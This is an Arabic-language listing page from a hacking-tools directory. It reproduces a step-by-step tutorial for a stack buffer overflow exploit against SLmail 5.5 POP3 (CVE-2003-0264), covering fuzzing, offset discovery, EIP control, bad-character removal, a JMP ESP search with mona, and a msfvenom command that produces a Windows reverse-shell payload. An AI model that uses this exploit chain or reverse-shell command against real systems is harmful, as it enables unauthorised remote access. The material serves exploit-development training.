Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2003-0264_EXPLOIT — تجاوز سعة المخزن المؤقت في Seattle Lab Mail (SLmail) 5.5 - POP3 | Kitploit
أدوات/GitHubGitHub/vrikodar/cve-2003-0264_exploit
الاستغلالشيل كودمصممي الأخطاءالاختبار العشوائياختبار الاختراقالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubvrikodar/cve-2003-0264_exploit

CVE-2003-0264_EXPLOIT

تجاوز سعة المخزن المؤقت في Seattle Lab Mail (SLmail) 5.5 - POP3

عرض المستودع
منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2003-0264_EXPLOIT

تجاوز سعة المخزن المؤقت في Seattle Lab Mail (SLmail) 5.5 - POP3

تجاوز سعة مخزن مؤقت قائم على المكدس خطوة بخطوة

1) تفحيش التطبيق

في الخطوة الأولى سنقوم بتفحيش التطبيق باستخدام سكربت Spike بسيط

في الوقت نفسه سيكون لدينا SLmail موصولًا [ويعمل] بـ Immunity Debugger

المزيد عن Spike:: https://resources.infosecinstitute.com/topic/intro-to-fuzzing/

يوجد هنا سكربت Spike بسيط باسم spike_fuzz.spk

سنقوم بتشغيله ضد التطبيق باستخدام الأمر

root@kitploit:~
  line_send_tcp 192.168.1.117 110 spike_fuzz.spk

حيث 192.168.1.117 هو عنوان IP للجهاز الهدف الذي يعمل عليه SLMail وهو يعمل على المنفذ 110

Capture

في هذه الأثناء إذا نظرنا إلى Immunity فسنرى أن التطبيق قد انهار

Capture

2) POC لتكرار الانهيار

الآن سننشئ POC بلغة Python يعيد إنتاج الانهيار ويحسب البايتات التي ينهار عندها التطبيق

root@kitploit:~
           python poc_crash.py

Capture

3) إيجاد الإزاحة

لإيجاد الإزاحة سنستخدم MSF

root@kitploit:~
      1. First Generate a pattern
      2. Note the EIP
      3. Query that EIP and Length with MSF to Find the Offset

msf-pattern_create -l 2700

Capture

في poc_offset.py سنستخدم هذا النمط كحاجز الفائض (Overflow Buffer)!

root@kitploit:~
       python poc_offset.py

Capture

عند هذه النقطة نلاحظ أيضًا قيمة EIP في Immunity حيث انهار التطبيق وتوقف

Capture

root@kitploit:~
        EIP is 39694438
        ::For Finding Offset::
        
        msf-pattern_offset -l 2700 -q 39694438

Capture

الإزاحة هي 2606، أي 2606 بايت قبل أن نصل إلى EIP::: و EIP نفسه طوله 4 بايتات

4) التحكم في EIP

الآن سنحاول الكتابة فوق EIP بأربعة أحرف B أي:: في Immunity يجب أن نرى 42424242 {الترميز السداسي العشري لأربعة أحرف B}

root@kitploit:~
        python poc_eip_control.py

Capture

والآن إذا تحققنا من Immunity

Capture

5) إيجاد الأحرف الضارة

لإبقاء هذا بسيطًا ومختصرًا

يمكنك تشغيل سكربت poc_badchars.py ثم إيجاد الأحرف الضارة بنفسك

لإبقاء هذا مختصرًا

يحتوي هذا التطبيق على حرفين ضارين {وهما الافتراضيان أيضًا}، عندما نشغّل poc_badchars.py في المرة الأولى سنرى أن الحرف \x0a يسبب مشكلة، ثم نزيله من حمولة الأحرف الضارة ونعيد تشغيل السكربت، وفي المرة الثانية سنرى أن الحرف \x0d تم تخطيه، لذا فهو الحرف الضار الثاني ونزيله من حمولتنا :: بعد ذلك عندما نشغّل السكربت للمرة الثالثة يكون كل شيء واضحًا وسليمًا!!

root@kitploit:~
        badchars are :: \x00\x0a\x0d
        {nullbyte, Line feed, carriage return}

        python poc_badchars.py

6) إيجاد الوحدة النمطية الصحيحة والعنوان

أولاً نجد الوحدة النمطية الصحيحة باستخدام Mona Modules في Immunity

root@kitploit:~
              slmfc.dll is the most appropriate candidate as it does not have memory protections!

Capture

والآن نجد عنوان JMP ESP داخل هذه DLL

سيتم كتابة هذا العنوان في EIP حتى نتمكن من إعادة توجيه تنفيذ البرنامج إلى ESP مما يؤدي إلى تنفيذ شيل كود الخاص بنا!

root@kitploit:~
        !mona find -s "\xff\xe4" -m slmfc.dll
        
        {\xff\xe4 opcode equivalent of JMP ESP}

Capture

من بين 19 عنوان مؤشر نختار الأول

7) إسقاط شيل

الآن سنجمع كل هذا معًا ونُسقط شيل

root@kitploit:~
              1.) generate the shell code {excluding badchars}
              2.) adding the address we Found {remeber Little Endian}
              3.) Add the buffer , return address, some nop-sleds, shellcode
              4.) we have a shell

لنقم بسرعة بتوليد شيل كود باستخدام msfvenom

root@kitploit:~
        msfvenom -p windows/shell_reverse_tcp LHOST=<lstening-ip> LPORT=<listening-port> EXITFUNC=thread -f py -a x86 -b "\x00\x0a\x0d"

Capture

نضع كل شيء معًا في ملف exploit.py

Capture

هذه المرة نشغّل SLmail بدون Immunity ونستمع أيضًا للاتصالات الواردة في نفس الوقت

بمجرد الانتهاء من ذلك سنقوم بتشغيل سكربت exploit.py النهائي!

Capture

ممتاز، لقد حصلنا على شيل!

تنزيل الأداة